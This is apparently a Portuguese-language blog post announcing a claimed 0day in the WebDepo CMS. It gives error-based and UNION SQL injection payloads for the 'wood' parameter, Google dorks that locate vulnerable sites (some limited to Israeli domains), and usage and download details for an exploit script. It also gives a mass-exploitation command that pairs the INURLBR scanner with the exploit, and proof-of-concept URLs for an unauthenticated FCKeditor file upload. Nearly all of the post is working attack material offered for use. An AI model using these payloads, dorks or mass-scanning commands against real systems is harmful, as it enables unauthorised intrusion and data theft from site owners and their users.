EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.AUTOR: GoogleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
VENTOR: http://www.webdepot.co.il
GET VULN: wood=(id) / $wood=intval($_REQUEST['wood'])
-----------------------------------------------------------------------------
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
-----------------------------------------------------------------------------
http://target.us/text.asp?wood=(id)+Exploit
GOOGLE DORK: inurl:"text.asp?wood="
GOOGLE DORK: site:il inurl:"text.asp?wood="
GOOGLE DORK: site:com inurl:"text.asp?wood="
Exploit:
Execute exploit:
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
DOWNLOAD Exploit: http://pastebin.com/b6bWuw7k
-----------------------------------------------------------------------------
EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --command-all "php 0dayWebDepo.php -t '_TARGET_'"
DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
VÍDEO
-----------------------------------------------------------------------------
A segunda falha:
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[2] - http://target.us/userfiles/file/{YOU_FILE}
Nenhum comentário:
Postar um comentário
............